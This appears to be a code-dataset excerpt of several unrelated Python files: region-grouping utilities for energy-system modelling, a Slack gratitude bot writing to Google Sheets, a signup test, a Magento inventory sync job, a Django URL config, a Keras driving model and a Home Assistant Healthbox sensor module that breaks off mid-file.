This dictionary consists of\n each component name and the corresponding data normalized (between [0, 1]),\n converted to vector form, and translated to distance meaning.\n - Size of each data array: n_regions\n :rtype: Dict[str, Dict[str, np.ndarray]]\n\n .. note::\n For each variable-component pair:\n - a normalised matrix of n_regions * n_regions is obtained\n - The matrix is flattened to obtain its vector form:\n [[0. 0.1 0.2]\n [0.1 0. 1. ] --> [0.1 0.2 1. ] (only the elements from upper or lower triangle\n [0.2 1. 0. ]] as the other is always redundant in a dist matrix )\n - Translate the matrix from connectivity (similarity) to distance (dissimilarity) : (1 - connectivity vector)\n \"\"\"\n\n processed_2d_dict = {}\n\n for var_name, var_dict in vars_dict.items():\n processed_2d_dict.update({var_name: {}})\n\n # For each component...\n for comp_name, da in var_dict.items():\n ## Normalize the data\n norm_comp_matrix = get_normalized_array(da.values)\n\n ## Obtain the vector form of this symmetric connectivity matrix\n norm_comp_vector = hierarchy.distance.squareform(\n norm_comp_matrix, checks=False\n )\n\n ## Convert the value of connectivity (similarity) to distance (dissimilarity)\n norm_comp_vector = 1 - norm_comp_vector\n\n ## Add to resulting dict\n processed_2d_dict.get(var_name).update({comp_name: norm_comp_vector})\n\n return processed_2d_dict\n\n\ndef preprocess_dataset(xarray_dataset):\n \"\"\"\n Preprocesses xarray dataset.\n\n :param xarray_dataset: the xarray dataset that needs to be preprocessed\n :type xarray_dataset: xr.Dataset\n\n :returns: dict_ts, dict_1d, dict_2d - Dictionaries obtained from\n preprocess_time_series(),\n preprocess_1d_variables(),\n and preprocess_2d_variables(), respectively\n :rtype: Dict\n \"\"\"\n\n # STEP 0. Traverse all variables in the dataset, and put them in separate categories\n # NOTE: vars_ts, vars_1d, vars_2d -> dicts of variables and their corresponding dataArrays\n vars_ts = PowerDict()\n vars_1d = PowerDict()\n vars_2d = PowerDict()\n\n for comp_class, comp_dict in xarray_dataset.items():\n for comp, comp_ds in comp_dict.items():\n for varname, da in comp_ds.data_vars.items():\n ## Time series\n if varname[:3] == \"ts_\":\n vars_ts[varname][comp] = da\n\n ## 1d variables\n elif varname[:3] == \"1d_\":\n vars_1d[varname][comp] = da\n\n ## 2d variables\n elif varname[:3] == \"2d_\":\n vars_2d[varname][comp] = da\n\n # STEP 1. Preprocess Time Series\n processed_ts_dict = preprocess_time_series(vars_ts)\n\n # STEP 2. Preprocess 1d Variables\n processed_1d_dict = preprocess_1d_variables(vars_1d)\n\n # STEP 3. 
Preprocess 2d Variables\n processed_2d_dict = preprocess_2d_variables(vars_2d)\n\n return processed_ts_dict, processed_1d_dict, processed_2d_dict\n\n\ndef get_custom_distance(\n processed_ts_dict,\n processed_1d_dict,\n processed_2d_dict,\n n_regions,\n region_index_x,\n region_index_y,\n weights=None,\n):\n \"\"\"\n Calculates and returns a customized distance between two regions.\n This distance is based on residual sum of squares, and is defined for\n two regions 'm' and 'n' as:\n D(m, n) = D_ts(m, n) + D_1d(m, n) + D_2d(m, n)\n\n where,\n D_ts(m, n) is cumulative distance of all time series variables:\n Sum of square of the difference between the values\n - summed over all time steps\n - summed over all time series variables\n\n D_1d(m, n) is cumulative distance of all 1d variables:\n Sum of square of the difference between the values\n - summed over all 1d variables\n\n D_2d(m, n) is cumulative distance of all 2d variables:\n Sum of square of (1 - value)\n - summed over all 2d variables\n\n (2d values define how strong the connection is between\n two regions. They are converted to distance meaning by\n subtracting it from 1).\n\n :param processed_ts_dict, processed_1d_dict, processed_2d_dict: Dictionaries obtained as a result of preprocess_dataset()\n :type processed_ts_dict, processed_1d_dict, processed_2d_dict: Dict\n\n :param n_regions: Total number of regions in the given data\n :type n_regions: int\n\n :param region_index_x, region_index_y: Indicate the two regions between which the custom distance is to be calculated\n range of these indices - [0, n_regions)\n :type region_index_x, region_index_y: int\n\n **Default arguments:**\n\n :param weights: weights for each variable-component pair\n |br| * the default value is None.\n :type weights: Dict\n\n :returns: Custom distance value\n :rtype: float\n \"\"\"\n\n # STEP 1. Check if weights are specified correctly\n if weights != None:\n if \"components\" not in weights.keys():\n raise ValueError(\n \"weights dictionary must contain a 'components' dictionary within it\"\n )\n\n if not set(weights.keys()).issubset({\"components\", \"variables\"}):\n raise ValueError(\n \"Something is wrong with the weights dictionary. Please refer to its template in the docstring\"\n )\n\n if \"variables\" in weights.keys():\n var_weights = weights.get(\"variables\")\n if isinstance(var_weights, str):\n if var_weights != \"all\":\n warnings.warn(\n \"Unrecognised string for variable weights. All variables will be weighted\"\n )\n weights[\"variables\"] = \"all\"\n\n else:\n warnings.warn(\n \"variable list not found in weights dictionary. All variables will be weighted\"\n )\n weights.update({\"variables\": \"all\"})\n\n
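 # For reference, a weights dict accepted by the checks above looks roughly like\n # {\"variables\": \"all\" or [\"varname\", ...], \"components\": {\"all\": 1} or {\"component name\": 2}}\n # (the variable and component names shown here are purely illustrative).\n\n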
 def _get_var_comp_weight(var_name, comp_name):\n \"\"\"Private function to get weight corresponding to a variable-component pair\"\"\"\n\n wgt = 1\n\n if weights != None:\n [var_category, var] = var_name.split(\n \"_\"\n ) # strip the category and take only var\n\n var_weights = weights.get(\"variables\")\n comp_weights = weights.get(\"components\")\n\n if (var_weights == \"all\") or (var in var_weights):\n if comp_weights.get(\"all\") != None:\n wgt = comp_weights.get(\"all\")\n elif comp_weights.get(comp_name) != None:\n wgt = comp_weights.get(comp_name)\n\n return wgt\n\n # STEP 2. Find distance for each variable category separately\n\n # STEP 3a. Distance of Time Series category\n distance_ts = 0\n for var_name, var_dict in processed_ts_dict.items():\n for comp_name, data_matrix in var_dict.items():\n # (i) Get weight\n var_comp_weight = _get_var_comp_weight(var_name, comp_name)\n\n # (ii) Extract data corresponding to the variable-component pair in both regions\n region_x_data = data_matrix[:, region_index_x]\n region_y_data = data_matrix[:, region_index_y]\n\n # (iii) Calculate distance\n # INFO: region_x_data and region_y_data are vectors:\n # subtract the vectors, square each element and add all elements. And multiply with its weight\n distance_ts += (\n sum(np.power((region_x_data - region_y_data), 2)) * var_comp_weight\n )\n\n # STEP 3b. Distance of 1d Variables category\n distance_1d = 0\n for var_name, var_dict in processed_1d_dict.items():\n for comp_name, data_array in var_dict.items():\n # (i) Get weight\n var_comp_weight = _get_var_comp_weight(var_name, comp_name)\n\n # (ii) Extract data corresponding to the variable in both regions\n region_x_data = data_array[region_index_x]\n region_y_data = data_array[region_index_y]\n\n # (iii) Calculate distance\n distance_1d += pow(region_x_data - region_y_data, 2) * var_comp_weight\n\n # STEP 3c. Distance of 2d Variables category\n distance_2d = 0\n\n # STEP 3c (i). Since processed_2d_dict is a condensed matrix, we have to get dist. corresponding to the two given regions\n region_index_x_y = (\n region_index_x * (n_regions - region_index_x)\n + (region_index_y - region_index_x)\n - 1\n )\n\n for var_name, var_dict in processed_2d_dict.items():\n for comp_name, data_array in var_dict.items():\n # (i) Get weight\n var_comp_weight = _get_var_comp_weight(var_name, comp_name)\n\n # (ii) Extract the condensed-vector entry corresponding to this region pair\n dist = data_array[region_index_x_y]\n\n if not np.isnan(\n dist\n ): # INFO: if the regions are not connected the value will be na\n # (iii) Calculate the distance\n distance_2d += pow(dist, 2) * var_comp_weight\n\n # STEP 4. Add all three distances\n return distance_ts + distance_1d + distance_2d\n\n\ndef get_custom_distance_matrix(\n processed_ts_dict, processed_1d_dict, processed_2d_dict, n_regions, weights=None\n):\n \"\"\"\n For every region combination, calculates the custom distance by calling get_custom_distance().\n\n :param processed_ts_dict, processed_1d_dict, processed_2d_dict: Dictionaries obtained as a result of preprocess_dataset()\n :type processed_ts_dict, processed_1d_dict, processed_2d_dict: Dict\n\n :param n_regions: Total number of regions in the given data\n :type n_regions: int\n\n **Default arguments:**\n\n :param weights: weights for each variable-component pair\n |br| * the default value is None.\n :type weights: Dict\n\n :returns: distMatrix - A n_regions by n_regions hollow, symmetric distance matrix\n :rtype: np.ndarray\n \"\"\"\n\n distMatrix = np.zeros((n_regions, n_regions))\n\n # STEP 1. For every region pair, calculate the distance\n for i in range(n_regions):\n for j in range(i + 1, n_regions):\n distMatrix[i, j] = get_custom_distance(\n processed_ts_dict,\n processed_1d_dict,\n processed_2d_dict,\n n_regions,\n i,\n j,\n weights,\n )\n\n # STEP 2. Only upper triangle has values, reflect these values in lower triangle to make it a hollow, symmetric matrix\n distMatrix += distMatrix.T - np.diag(distMatrix.diagonal())\n\n return distMatrix\n\n
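# An illustrative next step (not part of the original module): the condensed form of distMatrix can\n# drive SciPy's hierarchical clustering, e.g.\n# hierarchy.linkage(hierarchy.distance.squareform(distMatrix, checks=False), method=\"average\")\n\n\n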
def get_connectivity_matrix(xarray_datasets):\n \"\"\"\n Generates connectivity matrix for the given `xarray_datasets`.\n\n :param xarray_datasets: The dictionary of xarray datasets for which connectivity matrix needs\n to be generated\n :type xarray_datasets: Dict[str, xr.Dataset]\n\n :returns: connectivity_matrix - A n_regions by n_regions symmetric matrix\n :rtype: np.ndarray\n\n .. note::\n The `connectivity_matrix` indicates if two regions are connected or not.\n - In this matrix, if two regions are connected, it is indicated as 1 and 0 otherwise.\n - A given region pair is connected if:\n - Their borders touch at least at one point\n - In the case of an island, it is the island's nearest mainland region, or\n - The regions are connected via a transmission line or pipeline\n \"\"\"\n\n geom_xr = xarray_datasets.get(\"Geometry\")\n input_xr = xarray_datasets.get(\"Input\")\n\n n_regions = len(geom_xr[\"space\"].values)\n\n connectivity_matrix = np.zeros((n_regions, n_regions))\n\n # STEP 1: Check for contiguous neighbors\n geometries = gpd.GeoSeries(\n geom_xr[\"geometries\"].values\n ) # NOTE: disjoint seems to work only on geopandas or geoseries object\n for ix, geom in enumerate(geometries):\n neighbors = geometries[~geometries.disjoint(geom)].index.tolist()\n connectivity_matrix[ix, neighbors] = 1\n\n # STEP 2: Find nearest neighbor for island regions\n for row in range(len(connectivity_matrix)):\n if (\n np.count_nonzero(connectivity_matrix[row, :] == 1) == 1\n ): # if a region is connected only to itself\n # get the nearest neighbor based on regions centroids\n centroid_distances = geom_xr[\"centroid_distances\"].values[row, :]\n nearest_neighbor_idx = np.argmin(\n centroid_distances[np.nonzero(centroid_distances)]\n )\n\n # make the connection between the regions (both ways to keep it symmetric)\n (\n connectivity_matrix[row, nearest_neighbor_idx],\n connectivity_matrix[nearest_neighbor_idx, row],\n ) = (1, 1)\n\n # STEP 3: Additionally, check if there are transmission lines between regions that are not yet connected in the\n # connectivity matrix\n for comp_class, comp_dict in input_xr.items():\n for comp, comp_ds in comp_dict.items():\n for varname, da in comp_ds.data_vars.items():\n if varname[:3] == \"2d_\":\n connectivity_matrix[\n da.values > 0\n ] = 1 # if a positive, non-zero value exists, make a connection!\n\n return connectivity_matrix\n\n\ndef get_region_list(geom_xr, skip_regions, enforced_group):\n \"\"\"\n Generates a modified region list that is to be used during region grouping.\n\n :param geom_xr: The xarray dataset holding the geom info\n :type geom_xr: xr.Dataset\n\n :param skip_regions: The region IDs to be skipped while aggregating regions\n |br| * the default value is None\n :type skip_regions: List\n\n * Ex.: ['02_reg']\n ['02_reg', '03_reg']\n\n :param enforced_group: A group of regions that should be aggregated together\n |br| * the default value is None\n :type enforced_group: List\n\n * Ex.: ['01_es', '02_es', '03_es']\n\n :returns: regions_list, skipped_dict - The array of regions to be grouped and a dictionary of the skipped regions\n :rtype: np.ndarray, Dict\n \"\"\"\n\n if (skip_regions is not None) & (enforced_group is None):\n assert isinstance(\n skip_regions, list\n ), \"A list containing the region ID's to be skipped should be provided.\"\n\n # get all regions\n regions_list = geom_xr[\"space\"].values\n\n # remove regions that should be skipped\n regions_list = 
np.array(list(set(regions_list) - set(skip_regions)))\n\n # create skipped regions dict\n skipped_dict = {reg: [reg] for reg in skip_regions}\n\n elif (skip_regions is None) & (enforced_group is not None):\n assert isinstance(\n enforced_group, list\n ), \"A list containing the region IDs of the enforced group should be provided.\"\n\n # get subset of regions\n regions_list = np.array(list(enforced_group))\n\n # create an empty skipped regions dict\n skipped_dict = {}\n\n elif (skip_regions is not None) & (enforced_group is not None):\n assert isinstance(\n skip_regions, list\n ), \"A list containing the region ID's to be skipped should be provided.\"\n assert isinstance(\n enforced_group, list\n ), \"A list containing the region IDs of the enforced group should be provided.\"\n\n # get region subset based on enforced_group\n skip_regions, enforced_group = list(map(set, [skip_regions, enforced_group]))\n regions_list = enforced_group - skip_regions\n regions_list = np.array(list(regions_list))\n\n # create skipped regions dict\n skipped_dict = {reg: [reg] for reg in skip_regions}\n\n else:\n # get all regions\n regions_list = geom_xr[\"space\"].values\n skipped_dict = {}\n\n return regions_list, skipped_dict\n","repo_name":"FZJ-IEK3-VSA/FINE","sub_path":"FINE/aggregations/spatialAggregation/groupingUtils.py","file_name":"groupingUtils.py","file_ext":"py","file_size_in_byte":19642,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"37"} +{"seq_id":"73947679146","text":"\"\"\"An encouragement bot working on Slack, which stores data on Google Sheets.\"\"\"\n\nimport os\nimport sys\nfrom slack_bolt import App\nfrom slack_bolt.adapter.socket_mode import SocketModeHandler\nfrom slack_sdk.errors import SlackApiError\nfrom utils.logging import logger\nfrom utils import regex\nfrom google_sheet.io import append_to_sheet, get_from_sheet\nfrom utils.compose import compose_onetoall, id_reparthenese, compose_formatted_time\nfrom utils.parse_cfg import parse_cfg\n\napp = App(token=os.environ.get(\"SLACK_BOT_TOKEN\"))\n\n\n@app.event(\"app_mention\")\ndef handle_app_mention_events(body, say):\n \"\"\"Default message event handler\"\"\"\n # parse the message\n logger.debug(body)\n if 'edited' in body['event']:\n return\n text = body['event']['text']\n source = body['event']['user']\n target = regex.match_user.findall(text)\n logger.debug(f'Parsed Request: {source} to {target}')\n\n\n # filter out the bot/source and replace the user id with real name in the message\n real_target = []\n real_target_names = []\n for user in target:\n try:\n identity = app.client.users_info(user=user)\n except SlackApiError as e:\n logger.error(f\"Error getting user info: {e}\")\n continue\n\n text = text.replace(id_reparthenese(user), identity['user']['real_name'])\n if identity['user']['is_bot'] or user == source:\n continue\n \n real_target.append(user)\n real_target_names.append(identity['user']['real_name'])\n\n if len(real_target) > 0:\n logger.debug(f'User {source} to {real_target}: {real_target_names}')\n try:\n source_identity = app.client.users_info(user=source)\n source_name = source_identity['user']['real_name']\n except SlackApiError as e:\n logger.error(f\"Error getting user info: {e}\")\n return\n\n # set the constants\n time = compose_formatted_time(body['event_time'], config['timezone'])\n constants = [time, text]\n values = compose_onetoall(source_name, real_target_names, constants)\n\n # append to the details sheet\n 
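# compose_onetoall is assumed (from its name; the helper itself is not shown) to yield one row per recipient; the summary sheet below then gains a COUNTIF row for any user not yet listed.\n 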
append_to_sheet(config['spreadsheet_id'], config['sheet_name']+'!A1:A1', values)\n\n # check the summary sheet\n summary_names = get_from_sheet(config['spreadsheet_id'], config['summary_name']+'!A2:A')\n summary_names = [name[0] for name in summary_names]\n for name in real_target_names+[source_name,]:\n if name not in summary_names:\n append_to_sheet(config['spreadsheet_id'], config['summary_name']+'!A1:A1', \n [[name, f'=COUNTIF({config[\"sheet_name\"]}!A:A, \"{name}\")', f'=COUNTIF({config[\"sheet_name\"]}!B:B, \"{name}\")']],\n value_input_option='USER_ENTERED')\n \n # send a completion message to the source\n try:\n result = app.client.chat_postMessage(channel=source, text=f\"Your thank-you message to {', '.join(real_target_names)} has been recorded in {config['share_link']}\")\n logger.debug(result)\n for user in real_target:\n result = app.client.chat_postMessage(channel=user, text=f\"You just received a thank-you message from <@{source}>, details in {config['share_link']}\")\n logger.debug(result)\n except SlackApiError as e:\n logger.error(f\"Error posting message: {e}\")\n else:\n try:\n result = app.client.chat_postMessage(channel=source, text=f\"It seems you didn't mention any other user in the thank-you message. If this is a bug, please contact the bot developer.\")\n logger.debug(result)\n except SlackApiError as e:\n logger.error(f\"Error posting message: {e}\")\n\nif __name__ == \"__main__\":\n # parse config path\n if len(sys.argv) > 1:\n config_path = sys.argv[1]\n config = parse_cfg(config_path)\n else:\n config = parse_cfg()\n\n SocketModeHandler(app, os.environ[\"SLACK_APP_TOKEN\"]).start()\n","repo_name":"LemonAndRabbit/ES2-Bot","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1234084116","text":"import unittest\nimport uuid\nfrom .MockContext import MockContext\nimport src.signup.index\nimport src.signin.index\n\nclass SignupTest(unittest.TestCase):\n def test_signup(self):\n identity = str(uuid.uuid4())\n\n res = src.signup.index.handler(\n {\n 'IdentityId': identity,\n 'id': identity,\n 'identifier': '',\n 'provider': 'test',\n 'firstname': 'First',\n 'lastname': 'Last',\n 'displayName': 'First Last',\n 'email_address': 'test@domain.invalid'\n },\n MockContext('signup', '$LATEST')\n )\n\n res2 = src.signin.index.handler(\n {\n 'IdentityId': identity\n },\n MockContext('signin', '$LATEST')\n )\n\n self.assertEquals('success', res2['status'])\n self.assertEquals('login successful', res2['msg'])\n self.assertEquals(identity, res2['data']['IdentityId'])\n","repo_name":"mediix/SQRL_Web","sub_path":"Lambda/sqrlBackend/tests/testSignup.py","file_name":"testSignup.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"11583907631","text":"from YBLEGACY import qsatype\nimport json\nfrom datetime import datetime\n\nfrom controllers.base.magento2.inventory.controllers.inventory_upload import InventoryUpload\nfrom controllers.api.magento2.inventory_canal.serializers.inventorycanal_serializer import InventorySerializer\n\nclass Mg2InventoryCanalUpload(InventoryUpload):\n\n _ssw = \"\"\n\n def __init__(self, params=None):\n super().__init__(\"mg2inventorycanal\", params)\n\n inventory_params = self.get_param_sincro('mg2InventoryCanalUpload')\n self.inventory_url = inventory_params['url']\n self.inventory_test_url = 
inventory_params['test_url']\n\n self.set_sync_params(self.get_param_sincro('mg2'))\n\n self.small_sleep = 1\n self.large_sleep = 30\n self.no_sync_sleep = 60\n\n def get_data(self):\n data = self.get_db_data()\n\n if data == []:\n return data\n\n new_inventory = []\n\n oCanales = json.loads(qsatype.FLUtil.sqlSelect(\"param_parametros\", \"valor\", \"nombre = 'CANALES_WEB'\"))\n datos = {}\n datos[\"ocanales\"] = oCanales\n for idx in range(len(data)):\n datos[\"linea\"] = data[idx]\n inventory = self.get_inventorycanal_serializer().serialize(datos)\n new_inventory.append(inventory)\n \n '''inventory_default = inventory.copy()\n cantidad = 0\n if float(inventory_default['quantity']) > 0:\n cantidad = 1\n \n inventory_default.update({\n \"source_code\": \"default\",\n \"stock_id\": \"1\",\n \"quantity\": 1,\n \"status\": 1\n })\n \n new_inventory.append(inventory_default)'''\n\n if not new_inventory:\n return new_inventory\n\n return {\n \"sourceItems\": new_inventory\n }\n\n def get_inventorycanal_serializer(self):\n return InventorySerializer()\n\n def send_data(self, data):\n inventory_url = self.inventory_url if self.driver.in_production else self.inventory_test_url\n\n for idx in range(len(data[\"sourceItems\"])):\n del data[\"sourceItems\"][idx][\"children\"]\n if data:\n print(str(inventory_url))\n print(str(json.dumps(data)))\n result = self.send_request(\"post\", url=inventory_url, data=json.dumps(data))\n print(str(result))\n\n return data\n\n def get_db_data(self):\n body = []\n\n q = qsatype.FLSqlQuery()\n q.setSelect(\"ssw.idss, ssw.barcode, ssw.codcanalweb, aa.referencia, aa.talla, st.idstockmagento\")\n q.setFrom(\"eg_sincrostockwebcanalweb ssw INNER JOIN atributosarticulos aa ON ssw.barcode = aa.barcode INNER JOIN mg_storeviews st ON ssw.codcanalweb = st.codcanalweb\")\n q.setWhere(\"(NOT ssw.sincronizado OR ssw.sincronizado = false) AND st.activo GROUP BY ssw.idss, ssw.barcode, ssw.codcanalweb, aa.referencia, aa.talla, st.idstockmagento ORDER BY ssw.fecha desc, ssw.hora desc, ssw.idss LIMIT 50\")\n\n q.exec_()\n\n body = []\n if not q.size():\n return body\n\n body = self.fetch_query(q)\n for row in body:\n if self._ssw == \"\":\n self._ssw = str(row['ssw.idss'])\n else:\n self._ssw += \",\"\n self._ssw += str(row['ssw.idss'])\n\n return body\n\n def after_sync(self, response_data=None):\n qsatype.FLSqlQuery().execSql(\"UPDATE eg_sincrostockwebcanalweb SET sincronizado = true WHERE idss IN ({})\".format(self._ssw))\n\n self.log(\"Exito\", \"Stock sincronizado correctamente\")\n\n return self.small_sleep\n","repo_name":"yeboyebo/elganso_sync","sub_path":"ctrl_api_magento2_inventory_canal__mg2_inventorycanal_upload.py","file_name":"ctrl_api_magento2_inventory_canal__mg2_inventorycanal_upload.py","file_ext":"py","file_size_in_byte":3642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7067790206","text":"import os\nimport csv\nimport numpy as np\n\n# import basic scikit learn method for processing data\nfrom sklearn.model_selection import train_test_split\nfrom random import shuffle\nimport sklearn\nimport math\n\n# import all necessary keras modules necessary\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Flatten, Dropout\nfrom keras.layers.convolutional import Conv2D\nfrom keras.layers import Lambda, Cropping2D\nfrom math import ceil\nfrom keras.optimizers import Adam\n\n\n\n\nsamples = []\nwith open('./data/driving_log.csv') as csvfile:\n reader = csv.reader(csvfile)\n next(reader) 
#skips the first line\n\n for line in reader:\n samples.append(line)\n\ntrain_samples, validation_samples = train_test_split(samples, test_size=0.2)\n\nimport cv2\n\ndef generator(samples, batch_size=256):\n num_samples = len(samples)\n while 1: # Loop forever so the generator never terminates\n shuffle(samples)\n for offset in range(0, num_samples, batch_size):\n batch_samples = samples[offset:offset+batch_size]\n\n images = []\n angles = []\n for batch_sample in batch_samples:\n name = './data/IMG/'+batch_sample[0].split('/')[-1]\n center_image = cv2.imread(name)\n center_angle = float(batch_sample[3])\n images.append(center_image)\n angles.append(center_angle)\n\n # trim image to only see section with road\n X_train = np.array(images)\n y_train = np.array(angles)\n yield sklearn.utils.shuffle(X_train, y_train)\n\n# Set our batch size\nbatch_size = 256\n\n# compile and train the model using the generator function\ntrain_generator = generator(train_samples, batch_size=batch_size)\nvalidation_generator = generator(validation_samples, batch_size=batch_size)\n\nch, row, col = 3, 80, 320 # Trimmed image format\n\nmodel = Sequential()\n# Preprocess incoming data, centered around zero with small standard deviation \n\n#model.add(... finish defining the rest of your model architecture here ...)\nmodel.add(Cropping2D(cropping=((65, 20), (0, 0)), input_shape=(160,320,3)))\nmodel.add(Lambda(lambda x: x / 255.0 - 0.5, input_shape=(160, 320, 3)))\n\n#model.add(Lambda(lambda x: (x / 255.0) - 0.5))\nmodel.add(Conv2D(24, (5, 5), strides=(2, 2), activation='relu'))\nmodel.add(Conv2D(36, (5, 5), strides=(2, 2), activation='relu'))\nmodel.add(Conv2D(48, (5, 5), strides=(2, 2), activation='relu'))\nmodel.add(Conv2D(64, (3, 3), activation='relu'))\nmodel.add(Conv2D(64, (3, 3), activation='relu'))\nmodel.add(Flatten())\nmodel.add(Dense(100))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(50))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(10))\nmodel.add(Dense(1))\nmodel.compile(loss='mean_squared_error', optimizer=Adam(lr=0.0001))\nmodel.fit_generator (train_generator , \n steps_per_epoch = ceil(len(train_samples)/batch_size) ,\n validation_data = validation_generator ,\n validation_steps = ceil(len(validation_samples)/batch_size) ,\n epochs=6, verbose=1)\nmodel.save('model202.h5')\n\n","repo_name":"a7medhish/bahavirol-cloning","sub_path":"home/CarND-Behavioral-Cloning-P3/model2.py","file_name":"model2.py","file_ext":"py","file_size_in_byte":3157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24020423133","text":"from django.conf.urls.defaults import patterns, include, url\nfrom django.views.generic import DetailView, ListView\nfrom blog.models import Post\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'djblog.views.home', name='home'),\n # url(r'^djblog/', include('djblog.foo.urls')),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n (r'^', include('blog.urls')), \n url(r'^admin/', include(admin.site.urls)),\n url(r'(?P<slug>[a-zA-Z0-9_.-]+)/$',\n DetailView.as_view(\n model=Post,\n template_name='blog/post_detail.html'),\n 
name='single_post'),\n)\n","repo_name":"djchung/djblog","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"70199117547","text":"\"\"\"Sensor platform for healthbox.\"\"\"\nfrom __future__ import annotations\n\nfrom decimal import Decimal\nfrom collections.abc import Callable\nfrom dataclasses import dataclass\n\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.helpers.entity_platform import AddEntitiesCallback\nfrom homeassistant.helpers.entity import DeviceInfo\nfrom homeassistant.helpers.update_coordinator import CoordinatorEntity\nfrom homeassistant.const import (\n UnitOfTemperature,\n PERCENTAGE,\n CONCENTRATION_PARTS_PER_MILLION,\n CONCENTRATION_MICROGRAMS_PER_CUBIC_METER,\n)\n\n\nfrom homeassistant.components.sensor import (\n SensorEntity,\n SensorEntityDescription,\n SensorDeviceClass,\n SensorStateClass,\n)\n\n\nfrom .const import DOMAIN, MANUFACTURER, HealthboxRoom, LOGGER\nfrom .coordinator import HealthboxDataUpdateCoordinator\n\n\n@dataclass\nclass HealthboxGlobalEntityDescriptionMixin:\n \"\"\"Mixin values for Healthbox Global entities.\"\"\"\n\n value_fn: Callable[[], float | int | str | Decimal | None]\n\n\n@dataclass\nclass HealthboxGlobalSensorEntityDescription(\n SensorEntityDescription, HealthboxGlobalEntityDescriptionMixin\n):\n \"\"\"Class describing Healthbox Global sensor entities.\"\"\"\n\n\n@dataclass\nclass HealthboxRoomEntityDescriptionMixin:\n \"\"\"Mixin values for Healthbox Room entities.\"\"\"\n\n room: HealthboxRoom\n value_fn: Callable[[], float | int | str | Decimal | None]\n\n\n@dataclass\nclass HealthboxRoomSensorEntityDescription(\n SensorEntityDescription, HealthboxRoomEntityDescriptionMixin\n):\n \"\"\"Class describing Healthbox Room sensor entities.\"\"\"\n\n\ndef generate_room_sensors_for_healthbox(\n coordinator: HealthboxDataUpdateCoordinator,\n) -> list[HealthboxRoomSensorEntityDescription]:\n \"\"\"Generate sensors for each room.\"\"\"\n room_sensors: list[HealthboxRoomSensorEntityDescription] = []\n if coordinator.api.advanced_api_enabled:\n for room in coordinator.api.rooms:\n if \"indoor temperature\" in room.enabled_sensors:\n room_sensors.append(\n HealthboxRoomSensorEntityDescription(\n key=f\"{room.room_id}_temperature\",\n name=f\"{room.name} Temperature\",\n native_unit_of_measurement=UnitOfTemperature.CELSIUS,\n icon=\"mdi:thermometer\",\n device_class=SensorDeviceClass.TEMPERATURE,\n state_class=SensorStateClass.MEASUREMENT,\n room=room,\n value_fn=lambda x: x.indoor_temperature,\n suggested_display_precision=2,\n ),\n )\n if \"indoor relative humidity\" in room.enabled_sensors:\n room_sensors.append(\n HealthboxRoomSensorEntityDescription(\n key=f\"{room.room_id}_humidity\",\n name=f\"{room.name} Humidity\",\n native_unit_of_measurement=PERCENTAGE,\n icon=\"mdi:water-percent\",\n device_class=SensorDeviceClass.HUMIDITY,\n state_class=SensorStateClass.MEASUREMENT,\n room=room,\n value_fn=lambda x: x.indoor_humidity,\n suggested_display_precision=2,\n ),\n )\n if \"indoor CO2\" in room.enabled_sensors:\n if room.indoor_co2_concentration is not None:\n room_sensors.append(\n HealthboxRoomSensorEntityDescription(\n key=f\"{room.room_id}_co2_concentration\",\n name=f\"{room.name} CO2 Concentration\",\n native_unit_of_measurement=CONCENTRATION_PARTS_PER_MILLION,\n icon=\"mdi:molecule-co2\",\n 
device_class=SensorDeviceClass.CO2,\n state_class=SensorStateClass.MEASUREMENT,\n room=room,\n value_fn=lambda x: x.indoor_co2_concentration,\n suggested_display_precision=2,\n ),\n )\n if \"indoor air quality index\" in room.enabled_sensors:\n if room.indoor_aqi is not None:\n room_sensors.append(\n HealthboxRoomSensorEntityDescription(\n key=f\"{room.room_id}_aqi\",\n name=f\"{room.name} Air Quality Index\",\n native_unit_of_measurement=None,\n icon=\"mdi:leaf\",\n device_class=SensorDeviceClass.AQI,\n state_class=SensorStateClass.MEASUREMENT,\n room=room,\n value_fn=lambda x: x.indoor_aqi,\n suggested_display_precision=2,\n ),\n )\n if \"indoor volatile organic compounds\" in room.enabled_sensors:\n if room.indoor_voc_microg_per_cubic is not None:\n room_sensors.append(\n HealthboxRoomSensorEntityDescription(\n key=f\"{room.room_id}_voc\",\n name=f\"{room.name} Volatile Organic Compounds\",\n native_unit_of_measurement=CONCENTRATION_MICROGRAMS_PER_CUBIC_METER,\n icon=\"mdi:leaf\",\n device_class=SensorDeviceClass.VOLATILE_ORGANIC_COMPOUNDS,\n state_class=SensorStateClass.MEASUREMENT,\n room=room,\n value_fn=lambda x: x.indoor_voc_microg_per_cubic,\n suggested_display_precision=2,\n ),\n )\n\n for room in coordinator.api.rooms:\n if room.boost is not None:\n room_sensors.append(\n HealthboxRoomSensorEntityDescription(\n key=f\"{room.room_id}_boost_level\",\n name=f\"{room.name} Boost Level\",\n native_unit_of_measurement=PERCENTAGE,\n icon=\"mdi:fan\",\n # device_class=SensorDeviceClass.,\n state_class=SensorStateClass.MEASUREMENT,\n room=room,\n value_fn=lambda x: x.boost.level,\n suggested_display_precision=2,\n ),\n )\n if room.airflow_ventilation_rate is not None:\n room_sensors.append(\n HealthboxRoomSensorEntityDescription(\n key=f\"{room.room_id}_airflow_ventilation_rate\",\n name=f\"{room.name} Airflow Ventilation Rate\",\n native_unit_of_measurement=PERCENTAGE,\n icon=\"mdi:fan\",\n # 